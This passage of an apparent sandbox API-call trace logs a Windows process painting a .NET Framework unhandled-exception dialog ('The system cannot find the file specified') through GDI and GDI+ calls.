CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x84, wParam=0x0, lParam=0x1de031a) returned 0x1 [0058.194] IsWindowUnicode (hWnd=0x201e6) returned 1 [0058.194] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.194] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x84, wParam=0x0, lParam=0x1de031a) returned 0x1 [0058.194] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0058.194] SetCursor (hCursor=0x10003) returned 0x10007 [0058.195] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.195] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.200] _TrackMouseEvent (in: lpEventTrack=0x2457194 | out: lpEventTrack=0x2457194) returned 1 [0058.200] SendMessageW (hWnd=0x201e6, Msg=0xc137, wParam=0x0, lParam=0x0) returned 0x0 [0058.200] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0xc137, wParam=0x0, lParam=0x0) returned 0x0 [0058.200] InvalidateRect (hWnd=0x201e6, lpRect=0x0, bErase=0) returned 1 [0058.201] GetKeyState (nVirtKey=2) returned 0 [0058.201] GetKeyState (nVirtKey=4) returned 0 [0058.201] GetKeyState (nVirtKey=5) returned 0 [0058.201] GetKeyState (nVirtKey=6) returned 0 [0058.201] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.201] IsWindowUnicode (hWnd=0x201ca) returned 1 [0058.201] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.201] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.201] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.201] BeginPaint (in: hWnd=0x201ca, lpPaint=0x3ae208 | out: lpPaint=0x3ae208) returned 0x1501025e [0058.202] GdipCreateHalftonePalette () returned 0xffffffffc0080824 [0058.202] SelectPalette (hdc=0x1501025e, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.202] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.202] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.202] GetSystemMetrics (nIndex=42) returned 0 [0058.202] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ae17c, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.202] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ae17c) returned 0x18 [0058.202] SelectPalette (hdc=0x1501025e, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.203] EndPaint (hWnd=0x201ca, lpPaint=0x3ae204) returned 1 [0058.203] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.203] IsWindowUnicode (hWnd=0x201f2) returned 1 [0058.203] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.203] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.203] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.203] BeginPaint (in: hWnd=0x201f2, lpPaint=0x3ae228 | out: lpPaint=0x3ae228) returned 0x101084f [0058.203] SelectPalette (hdc=0x101084f, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.204] CreateCompatibleDC (hdc=0x101084f) returned 0x1e01026d [0058.204] GetObjectType (h=0x101084f) returned 0x3 [0058.204] CreateCompatibleBitmap (hdc=0x101084f, cx=1, cy=1) returned 0x75050828 [0058.204] GetDIBits (in: hdc=0x101084f, hbm=0x75050828, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x3add18, usage=0x0 | out: lpvBits=0x0, lpbmi=0x3add18) returned 1 [0058.205] GetDIBits (in: hdc=0x101084f, hbm=0x75050828, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x3add18, usage=0x0 | out: lpvBits=0x0, lpbmi=0x3add18) returned 1 [0058.205] DeleteObject (ho=0x75050828) returned 1 [0058.205] CreateDIBSection (in: hdc=0x101084f, lpbmi=0x3add68, usage=0x0, ppvBits=0x3ae25c, hSection=0x0, offset=0x0 | out: ppvBits=0x3ae25c) returned 0x3d050241 [0058.205] SelectObject (hdc=0x1e01026d, h=0x3d050241) returned 0x185000f [0058.205] GdipCreateFromHDC (hdc=0x1e01026d, graphics=0x3ae240) returned 0x0 [0058.205] GdipTranslateWorldTransform (graphics=0x4e4f360, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0058.206] GdipSetClipRectI (graphics=0x4e4f360, x=0, y=0, width=64, height=64, combineMode=0x0) returned 0x0 [0058.230] GdipCreateMatrix (matrix=0x3ae288) returned 0x0 [0058.230] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.232] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3ae2a0) returned 0x0 [0058.232] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x46e640 [0058.232] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x46e640) returned 0x0 [0058.233] LocalFree (hMem=0x46e640) returned 0x0 [0058.233] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.233] GdipCreateRegion (region=0x3ae288) returned 0x0 [0058.234] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.234] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3ae294) returned 0x0 [0058.234] GdipSaveGraphics (graphics=0x4e4f360, state=0x3ae2c0) returned 0x0 [0058.235] GetWindowTextLengthW (hWnd=0x201f2) returned 0 [0058.235] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0058.235] GetSystemMetrics (nIndex=42) returned 0 [0058.235] GetWindowTextW (in: hWnd=0x201f2, lpString=0x3ae1d8, nMaxCount=1 | out: lpString="") returned 0 [0058.235] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0xd, wParam=0x1, lParam=0x3ae1d8) returned 0x0 [0058.235] GetClientRect (in: hWnd=0x201f2, lpRect=0x3ae288 | out: lpRect=0x3ae288) returned 1 [0058.236] GdipCreateRegion (region=0x3ae0dc) returned 0x0 [0058.236] GdipGetClip (graphics=0x4e4f360, region=0x4e4f870) returned 0x0 [0058.236] GdipCreateMatrix (matrix=0x3ae0dc) returned 0x0 [0058.236] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.236] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3ae0f4) returned 0x0 [0058.236] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x46e640 [0058.237] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x46e640) returned 0x0 [0058.237] LocalFree (hMem=0x46e640) returned 0x0 [0058.237] GdipCombineRegionRegion (region=0x4e4f870, region2=0x4efc950, combineMode=0x1) returned 0x0 [0058.237] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x46e640 [0058.237] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x46e640) returned 0x0 [0058.237] LocalFree (hMem=0x46e640) returned 0x0 [0058.237] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.238] GdipIsInfiniteRegion (region=0x4e4f870, graphics=0x4e4f360, result=0x3ae11c) returned 0x0 [0058.238] GdipIsInfiniteRegion (region=0x4e4f870, graphics=0x4e4f360, result=0x3ae10c) returned 0x0 [0058.238] GdipGetRegionHRgn (region=0x4e4f870, graphics=0x4e4f360, hRgn=0x3ae10c) returned 0x0 [0058.238] GdipDeleteRegion (region=0x4e4f870) returned 0x0 [0058.239] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae124) returned 0x0 [0058.239] GetCurrentObject (hdc=0x1e01026d, type=0x1) returned 0x1b00017 [0058.239] GetCurrentObject (hdc=0x1e01026d, type=0x2) returned 0x1900010 [0058.239] GetCurrentObject (hdc=0x1e01026d, type=0x7) returned 0x3d050241 [0058.239] GetCurrentObject (hdc=0x1e01026d, type=0x6) returned 0x18a002e [0058.239] SaveDC (hdc=0x1e01026d) returned 1 [0058.239] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x4d040871 [0058.239] GetClipRgn (hdc=0x1e01026d, hrgn=0x4d040871) returned 0 [0058.240] SelectClipRgn (hdc=0x1e01026d, hrgn=0xd6040827) returned 2 [0058.240] DeleteObject (ho=0x4d040871) returned 1 [0058.240] DeleteObject (ho=0xd6040827) returned 1 [0058.240] OffsetViewportOrgEx (in: hdc=0x1e01026d, x=0, y=0, lppt=0x2458878 | out: lppt=0x2458878) returned 1 [0058.240] GetNearestColor (hdc=0x1e01026d, color=0xf0f0f0) returned 0xf0f0f0 [0058.240] CreateSolidBrush (color=0xf0f0f0) returned 0x1a100257 [0058.240] FillRect (hDC=0x1e01026d, lprc=0x3ae128, hbr=0x1a100257) returned 1 [0058.240] DeleteObject (ho=0x1a100257) returned 1 [0058.240] RestoreDC (hdc=0x1e01026d, nSavedDC=-1) returned 1 [0058.241] GdipReleaseDC (graphics=0x4e4f360, hdc=0x1e01026d) returned 0x0 [0058.241] GdipRestoreGraphics (graphics=0x4e4f360, state=0xfdb40dbd) returned 0x0 [0058.241] GdipDeleteRegion (region=0x4efc950) returned 0x0 [0058.241] GetWindowTextLengthW (hWnd=0x201f2) returned 0 [0058.241] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0058.241] GetSystemMetrics (nIndex=42) returned 0 [0058.241] GetWindowTextW (in: hWnd=0x201f2, lpString=0x3ae1d8, nMaxCount=1 | out: lpString="") returned 0 [0058.241] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f2, Msg=0xd, wParam=0x1, lParam=0x3ae1d8) returned 0x0 [0058.241] GdipGetImageWidth (image=0x4efc400, width=0x3ae170) returned 0x0 [0058.241] GdipGetImageHeight (image=0x4efc400, height=0x3ae170) returned 0x0 [0058.242] GdipGetImageWidth (image=0x4efc400, width=0x3ae15c) returned 0x0 [0058.242] GdipGetImageHeight (image=0x4efc400, height=0x3ae15c) returned 0x0 [0058.242] GdipDrawImageRectI (graphics=0x4e4f360, image=0x4efc400, x=16, y=16, width=32, height=32) returned 0x0 [0058.242] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae280) returned 0x0 [0058.243] BitBlt (hdc=0x101084f, x=0, y=0, cx=64, cy=64, hdcSrc=0x1e01026d, x1=0, y1=0, rop=0xcc0020) returned 1 [0058.243] GdipReleaseDC (graphics=0x4e4f360, hdc=0x1e01026d) returned 0x0 [0058.243] SelectPalette (hdc=0x101084f, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.243] SelectObject (hdc=0x1e01026d, h=0x185000f) returned 0x3d050241 [0058.253] DeleteDC (hdc=0x1e01026d) returned 1 [0058.253] GdipDeleteGraphics (graphics=0x4e4f360) returned 0x0 [0058.253] EndPaint (hWnd=0x201f2, lpPaint=0x3ae224) returned 1 [0058.253] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.253] IsWindowUnicode (hWnd=0x201f6) returned 1 [0058.253] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.253] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.253] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.253] BeginPaint (in: hWnd=0x201f6, lpPaint=0x3ae1ec | out: lpPaint=0x3ae1ec) returned 0x101084f [0058.253] SelectPalette (hdc=0x101084f, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.253] CreateCompatibleDC (hdc=0x101084f) returned 0x2001026d [0058.253] GetObjectType (h=0x101084f) returned 0x3 [0058.253] CreateCompatibleBitmap (hdc=0x101084f, cx=1, cy=1) returned 0x7305083a [0058.253] GetDIBits (in: hdc=0x101084f, hbm=0x7305083a, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x3adc9c, usage=0x0 | out: lpvBits=0x0, lpbmi=0x3adc9c) returned 1 [0058.254] GetDIBits (in: hdc=0x101084f, hbm=0x7305083a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x3adc9c, usage=0x0 | out: lpvBits=0x0, lpbmi=0x3adc9c) returned 1 [0058.254] DeleteObject (ho=0x7305083a) returned 1 [0058.254] CreateDIBSection (in: hdc=0x101084f, lpbmi=0x3adcec, usage=0x0, ppvBits=0x3ae1e0, hSection=0x0, offset=0x0 | out: ppvBits=0x3ae1e0) returned 0xc7050835 [0058.255] SelectObject (hdc=0x2001026d, h=0xc7050835) returned 0x185000f [0058.255] GdipCreateFromHDC (hdc=0x2001026d, graphics=0x3ae1c4) returned 0x0 [0058.255] GdipTranslateWorldTransform (graphics=0x4e4f360, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0058.255] GdipSetClipRectI (graphics=0x4e4f360, x=0, y=0, width=354, height=68, combineMode=0x0) returned 0x0 [0058.255] GdipCreateMatrix (matrix=0x3ae24c) returned 0x0 [0058.255] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.255] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3ae264) returned 0x0 [0058.255] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x46e640 [0058.255] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x46e640) returned 0x0 [0058.255] LocalFree (hMem=0x46e640) returned 0x0 [0058.255] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.255] GdipCreateRegion (region=0x3ae24c) returned 0x0 [0058.255] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.255] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3ae258) returned 0x0 [0058.255] GdipSaveGraphics (graphics=0x4e4f360, state=0x3ae284) returned 0x0 [0058.255] GetWindowTextLengthW (hWnd=0x201f6) returned 245 [0058.256] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf5 [0058.256] GetSystemMetrics (nIndex=42) returned 0 [0058.256] GetWindowTextW (in: hWnd=0x201f6, lpString=0x3adfb4, nMaxCount=246 | out: lpString="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.") returned 245 [0058.256] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xd, wParam=0xf6, lParam=0x3adfb4) returned 0xf5 [0058.256] GetClientRect (in: hWnd=0x201f6, lpRect=0x3ae24c | out: lpRect=0x3ae24c) returned 1 [0058.256] GdipCreateRegion (region=0x3ae0a0) returned 0x0 [0058.256] GdipGetClip (graphics=0x4e4f360, region=0x4e4f870) returned 0x0 [0058.256] GdipCreateMatrix (matrix=0x3ae0a0) returned 0x0 [0058.256] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efffb0) returned 0x0 [0058.256] GdipIsMatrixIdentity (matrix=0x4efffb0, result=0x3ae0b8) returned 0x0 [0058.256] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x46e640 [0058.256] GdipGetMatrixElements (matrix=0x4efffb0, matrixOut=0x46e640) returned 0x0 [0058.256] LocalFree (hMem=0x46e640) returned 0x0 [0058.256] GdipCombineRegionRegion (region=0x4e4f870, region2=0x4efc950, combineMode=0x1) returned 0x0 [0058.256] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x46e640 [0058.256] GdipGetMatrixElements (matrix=0x4efffb0, matrixOut=0x46e640) returned 0x0 [0058.256] LocalFree (hMem=0x46e640) returned 0x0 [0058.256] GdipDeleteMatrix (matrix=0x4efffb0) returned 0x0 [0058.257] GdipIsInfiniteRegion (region=0x4e4f870, graphics=0x4e4f360, result=0x3ae0e0) returned 0x0 [0058.257] GdipIsInfiniteRegion (region=0x4e4f870, graphics=0x4e4f360, result=0x3ae0d0) returned 0x0 [0058.257] GdipGetRegionHRgn (region=0x4e4f870, graphics=0x4e4f360, hRgn=0x3ae0d0) returned 0x0 [0058.257] GdipDeleteRegion (region=0x4e4f870) returned 0x0 [0058.257] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae0e8) returned 0x0 [0058.257] GetCurrentObject (hdc=0x2001026d, type=0x1) returned 0x1b00017 [0058.257] GetCurrentObject (hdc=0x2001026d, type=0x2) returned 0x1900010 [0058.257] GetCurrentObject (hdc=0x2001026d, type=0x7) returned 0xffffffffc7050835 [0058.257] GetCurrentObject (hdc=0x2001026d, type=0x6) returned 0x18a002e [0058.257] SaveDC (hdc=0x2001026d) returned 1 [0058.257] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xd7040827 [0058.257] GetClipRgn (hdc=0x2001026d, hrgn=0xd7040827) returned 0 [0058.257] SelectClipRgn (hdc=0x2001026d, hrgn=0x4e040871) returned 2 [0058.257] DeleteObject (ho=0xd7040827) returned 1 [0058.257] DeleteObject (ho=0x4e040871) returned 1 [0058.257] OffsetViewportOrgEx (in: hdc=0x2001026d, x=0, y=0, lppt=0x245a288 | out: lppt=0x245a288) returned 1 [0058.257] GetNearestColor (hdc=0x2001026d, color=0xf0f0f0) returned 0xf0f0f0 [0058.258] CreateSolidBrush (color=0xf0f0f0) returned 0x1b100257 [0058.258] FillRect (hDC=0x2001026d, lprc=0x3ae0ec, hbr=0x1b100257) returned 1 [0058.258] DeleteObject (ho=0x1b100257) returned 1 [0058.259] RestoreDC (hdc=0x2001026d, nSavedDC=-1) returned 1 [0058.259] GdipReleaseDC (graphics=0x4e4f360, hdc=0x2001026d) returned 0x0 [0058.259] GdipRestoreGraphics (graphics=0x4e4f360, state=0xfdb20dbd) returned 0x0 [0058.259] GdipDeleteRegion (region=0x4efc950) returned 0x0 [0058.259] GetWindowTextLengthW (hWnd=0x201f6) returned 245 [0058.259] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf5 [0058.259] GetSystemMetrics (nIndex=42) returned 0 [0058.259] GetWindowTextW (in: hWnd=0x201f6, lpString=0x3adfb4, nMaxCount=246 | out: lpString="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.") returned 245 [0058.259] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xd, wParam=0xf6, lParam=0x3adfb4) returned 0xf5 [0058.259] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae108) returned 0x0 [0058.259] GetCurrentObject (hdc=0x2001026d, type=0x1) returned 0x1b00017 [0058.259] GetCurrentObject (hdc=0x2001026d, type=0x2) returned 0x1900010 [0058.259] GetCurrentObject (hdc=0x2001026d, type=0x7) returned 0xffffffffc7050835 [0058.259] GetCurrentObject (hdc=0x2001026d, type=0x6) returned 0x18a002e [0058.259] SaveDC (hdc=0x2001026d) returned 1 [0058.259] GetNearestColor (hdc=0x2001026d, color=0x0) returned 0x0 [0058.259] RestoreDC (hdc=0x2001026d, nSavedDC=-1) returned 1 [0058.259] GdipReleaseDC (graphics=0x4e4f360, hdc=0x2001026d) returned 0x0 [0058.260] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.260] AdjustWindowRectEx (in: lpRect=0x3ae02c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae02c) returned 1 [0058.265] GdipGetFamilyName (in: family=0x4fdf6b8, name=0x3adf1c, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0 [0058.266] CreateCompatibleDC (hdc=0x0) returned 0x7701083a [0058.266] GetCurrentObject (hdc=0x7701083a, type=0x1) returned 0x1b00017 [0058.266] GetCurrentObject (hdc=0x7701083a, type=0x2) returned 0x1900010 [0058.267] GetCurrentObject (hdc=0x7701083a, type=0x7) returned 0x185000f [0058.267] GetCurrentObject (hdc=0x7701083a, type=0x6) returned 0x18a002e [0058.267] SaveDC (hdc=0x7701083a) returned 1 [0058.267] GetDeviceCaps (hdc=0x7701083a, index=90) returned 96 [0058.267] CoTaskMemAlloc (cb=0x5c) returned 0x6b056e8 [0058.268] CreateFontIndirectW (lplf=0x6b056e8) returned 0x2d0a07c0 [0058.268] CoTaskMemFree (pv=0x6b056e8) [0058.268] GetObjectW (in: h=0x2d0a07c0, c=92, pv=0x3adef4 | out: pv=0x3adef4) returned 92 [0058.268] GetCurrentObject (hdc=0x7701083a, type=0x6) returned 0x18a002e [0058.269] GetObjectW (in: h=0x18a002e, c=92, pv=0x3ade4c | out: pv=0x3ade4c) returned 92 [0058.269] SelectObject (hdc=0x7701083a, h=0x2d0a07c0) returned 0x18a002e [0058.269] GetMapMode (hdc=0x7701083a) returned 1 [0058.270] GetTextMetricsW (in: hdc=0x7701083a, lptm=0x3adf00 | out: lptm=0x3adf00) returned 1 [0058.271] DrawTextExW (in: hdc=0x7701083a, lpchText="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.", cchText=245, lprc=0x3ae014, format=0x102400, lpdtp=0x245af6c | out: lpchText="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.", lprc=0x3ae014) returned 39 [0058.272] GdipGetTextRenderingHint (graphics=0x4e4f360, mode=0x3ae0a8) returned 0x0 [0058.272] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae094) returned 0x0 [0058.272] GetCurrentObject (hdc=0x2001026d, type=0x1) returned 0x1b00017 [0058.272] GetCurrentObject (hdc=0x2001026d, type=0x2) returned 0x1900010 [0058.272] GetCurrentObject (hdc=0x2001026d, type=0x7) returned 0xffffffffc7050835 [0058.272] GetCurrentObject (hdc=0x2001026d, type=0x6) returned 0x18a002e [0058.272] SaveDC (hdc=0x2001026d) returned 1 [0058.273] GetTextAlign (hdc=0x2001026d) returned 0x0 [0058.273] GetTextColor (hdc=0x2001026d) returned 0x0 [0058.273] GetCurrentObject (hdc=0x2001026d, type=0x6) returned 0x18a002e [0058.273] GetObjectW (in: h=0x18a002e, c=92, pv=0x3add9c | out: pv=0x3add9c) returned 92 [0058.273] SelectObject (hdc=0x2001026d, h=0x2d0a07c0) returned 0x18a002e [0058.273] GetBkMode (hdc=0x2001026d) returned 2 [0058.274] SetBkMode (hdc=0x2001026d, mode=1) returned 2 [0058.274] DrawTextExW (in: hdc=0x2001026d, lpchText="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.", cchText=245, lprc=0x3ae028, format=0x102010, lpdtp=0x245b194 | out: lpchText="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.", lprc=0x3ae028) returned 65 [0058.277] RestoreDC (hdc=0x2001026d, nSavedDC=-1) returned 1 [0058.277] GdipReleaseDC (graphics=0x4e4f360, hdc=0x2001026d) returned 0x0 [0058.277] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae244) returned 0x0 [0058.277] BitBlt (hdc=0x101084f, x=0, y=0, cx=354, cy=68, hdcSrc=0x2001026d, x1=0, y1=0, rop=0xcc0020) returned 1 [0058.277] GdipReleaseDC (graphics=0x4e4f360, hdc=0x2001026d) returned 0x0 [0058.277] SelectPalette (hdc=0x101084f, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.277] SelectObject (hdc=0x2001026d, h=0x185000f) returned 0xc7050835 [0058.277] DeleteDC (hdc=0x2001026d) returned 1 [0058.277] GdipDeleteGraphics (graphics=0x4e4f360) returned 0x0 [0058.277] DeleteObject (ho=0xc7050835) returned 1 [0058.278] EndPaint (hWnd=0x201f6, lpPaint=0x3ae1e8) returned 1 [0058.278] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.278] IsWindowUnicode (hWnd=0x201f4) returned 1 [0058.278] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.278] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.278] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.278] BeginPaint (in: hWnd=0x201f4, lpPaint=0x3ae1e0 | out: lpPaint=0x3ae1e0) returned 0x101084f [0058.278] SelectPalette (hdc=0x101084f, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.278] CreateCompatibleDC (hdc=0x101084f) returned 0xcd0101b7 [0058.278] DeleteObject (ho=0x3d050241) returned 1 [0058.278] GetObjectType (h=0x101084f) returned 0x3 [0058.279] CreateCompatibleBitmap (hdc=0x101084f, cx=1, cy=1) returned 0x77050828 [0058.279] GetDIBits (in: hdc=0x101084f, hbm=0x77050828, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x3adcd0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x3adcd0) returned 1 [0058.279] GetDIBits (in: hdc=0x101084f, hbm=0x77050828, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x3adcd0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x3adcd0) returned 1 [0058.279] DeleteObject (ho=0x77050828) returned 1 [0058.279] CreateDIBSection (in: hdc=0x101084f, lpbmi=0x3add20, usage=0x0, ppvBits=0x3ae214, hSection=0x0, offset=0x0 | out: ppvBits=0x3ae214) returned 0x3e050241 [0058.279] SelectObject (hdc=0xcd0101b7, h=0x3e050241) returned 0x185000f [0058.279] GdipCreateFromHDC (hdc=0xcd0101b7, graphics=0x3ae1f8) returned 0x0 [0058.279] GdipTranslateWorldTransform (graphics=0x4e4f360, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0058.279] GdipSetClipRectI (graphics=0x4e4f360, x=0, y=0, width=100, height=23, combineMode=0x0) returned 0x0 [0058.279] GdipCreateMatrix (matrix=0x3ae240) returned 0x0 [0058.279] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.279] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3ae258) returned 0x0 [0058.279] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.279] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.279] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.280] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.280] GdipCreateRegion (region=0x3ae240) returned 0x0 [0058.280] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.280] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3ae24c) returned 0x0 [0058.280] GdipSaveGraphics (graphics=0x4e4f360, state=0x3ae278) returned 0x0 [0058.280] GdipRestoreGraphics (graphics=0x4e4f360, state=0xfdb00dbd) returned 0x0 [0058.280] GdipDeleteRegion (region=0x4efc950) returned 0x0 [0058.280] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x3ae0fc, fWinIni=0x0 | out: pvParam=0x3ae0fc) returned 1 [0058.280] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae064) returned 0x0 [0058.281] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.281] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.281] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.281] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.281] SaveDC (hdc=0xcd0101b7) returned 1 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0xa0a0a0) returned 0xa0a0a0 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0x696969) returned 0x696969 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0xa0a0a0) returned 0xa0a0a0 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0x0) returned 0x0 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0xffffff) returned 0xffffff [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0xe5e5e5) returned 0xe5e5e5 [0058.281] GetNearestColor 